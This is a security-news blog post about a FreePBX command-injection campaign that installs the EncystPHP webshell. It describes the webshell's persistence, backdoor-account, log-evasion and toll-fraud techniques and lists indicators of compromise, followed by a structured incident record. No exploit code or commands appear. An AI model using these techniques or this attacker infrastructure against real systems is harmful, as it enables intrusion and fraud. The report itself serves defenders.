• Home
  • cyber
  • FreePBX and Indian technology firm: Hackers Exploiting FreePBX Vulnerability to Deploy Webshell and Gain Control of Systems
cyber Vulnerability

FreePBX and Indian technology firm: Hackers Exploiting FreePBX Vulnerability to Deploy Webshell and Gain Control of Systems

Dec 1, 2025 2 min read
FreePBX and Indian technology firm: Hackers Exploiting FreePBX Vulnerability to Deploy Webshell and Gain Control of Systems

Sophisticated FreePBX Attack Campaign Deploys Persistent "EncystPHP" Webshell

A financially motivated hacker group, INJ3CTOR3, has launched a targeted attack campaign exploiting CVE-2025-64328, a critical post-authentication command-injection vulnerability in FreePBX’s Endpoint Manager. The campaign, active since early December 2025, deploys EncystPHP, a highly evasive webshell granting attackers full administrative control over compromised VoIP and PBX systems.

Exploitation & Attack Chain

The vulnerability, tracked in the Filestore component’s check_ssh_connect() function, allows authenticated attackers to execute arbitrary commands as the asterisk user. Attack traffic originated from Brazil, targeting cloud-based VoIP environments managed by an Indian technology firm.

Threat actors downloaded the EncystPHP dropper from 45[.]234[.]176[.]202, a server masquerading as a VoIP management portal (crm[.]razatelefonia[.]pro). The malware redirects victims to a secondary dropper (k.php) before deploying the webshell.

EncystPHP Capabilities & Persistence

The webshell, disguised as ajax.php, employs MD5-hashed authentication and an interactive "Ask Master" interface for remote command execution. Key features include:

  • Multi-stage persistence: Cron jobs, redundant droppers in /var/www/html/, and forged timestamps to evade detection.
  • Privilege escalation: Creates a root-level "newfpbx" account, resets user passwords, and injects SSH keys for backdoor access.
  • Evasion techniques: Modifies file permissions, disables error logging, and removes competing malware.
  • Telephony abuse: Enumerates SIP peers, Asterisk channels, and initiates unauthorized calls for toll fraud.

Attribution & Historical Context

INJ3CTOR3, active since 2020, has a history of targeting VoIP systems for financial gain. Previous campaigns exploited:

  • CVE-2019-19006 (FreePBX, 2020)
  • CVE-2021-45461 (Elastix, 2022)

Indicators of Compromise (IoCs)

  • C2 Infrastructure: 45[.]234[.]176[.]202, 187[.]108[.]1[.]130, crm[.]razatelefonia[.]pro
  • Webshell Hashes:
    • 71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302 (EncystPHP)
    • 7e3a47e3c6b82eb02f6f1e4be6b8de4762194868a8de8fc9103302af7915c574 (Dropper)
  • File Paths: /var/www/html/admin/views/ajax.php, /var/www/html/rest_phones/ajax.php
  • Detection Signatures: PHP/EncystPHP.A!tr, IPS Signature 59448

The attack underscores the persistent targeting of VoIP infrastructure for monetization, with unpatched FreePBX systems at high risk of full compromise.

Source: https://cybersecuritynews.com/freepbx-vulnerability-exploited/

YASH Technologies cybersecurity rating report: https://www.rankiteo.com/company/yash-technologies

FreePBX cybersecurity rating report: https://www.rankiteo.com/company/freepbx

"id": "YASFRE1769690560",
"linkid": "yash-technologies, freepbx",
"type": "Vulnerability",
"date": "12/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'industry': 'VoIP/Telecommunications',
                        'location': 'India',
                        'name': 'Indian technology firm (unnamed)',
                        'type': 'Technology Firm'}],
 'attack_vector': 'Exploitation of CVE-2025-64328 (post-authentication '
                  'command-injection vulnerability in FreePBX’s Endpoint '
                  'Manager)',
 'date_detected': '2025-12-01',
 'description': 'A financially motivated hacker group, INJ3CTOR3, has launched '
                'a targeted attack campaign exploiting CVE-2025-64328, a '
                'critical post-authentication command-injection vulnerability '
                'in FreePBX’s Endpoint Manager. The campaign deploys '
                'EncystPHP, a highly evasive webshell granting attackers full '
                'administrative control over compromised VoIP and PBX systems.',
 'impact': {'financial_loss': 'Toll fraud',
            'operational_impact': 'Full administrative control over '
                                  'compromised systems',
            'systems_affected': 'VoIP and PBX systems'},
 'initial_access_broker': {'backdoors_established': 'SSH keys, root-level '
                                                    "'newfpbx' account",
                           'entry_point': 'CVE-2025-64328 (FreePBX Endpoint '
                                          'Manager)',
                           'high_value_targets': 'VoIP and PBX systems'},
 'motivation': 'Financial gain',
 'post_incident_analysis': {'root_causes': 'Unpatched FreePBX systems, '
                                           'exploitation of CVE-2025-64328'},
 'references': [{'source': 'Threat Intelligence Report'}],
 'threat_actor': 'INJ3CTOR3',
 'title': 'Sophisticated FreePBX Attack Campaign Deploys Persistent '
          "'EncystPHP' Webshell",
 'type': 'Webshell Deployment',
 'vulnerability_exploited': 'CVE-2025-64328'}
Published by
Jeremy C
Jeremy C
You might also like
Great! Next, complete checkout for full access to Rankiteo Blog.
Welcome back! You've successfully signed in.
You've successfully subscribed to Rankiteo Blog.
Success! Your account is fully activated, you now have access to all content.
Success! Your billing info has been updated.
Your billing was not updated.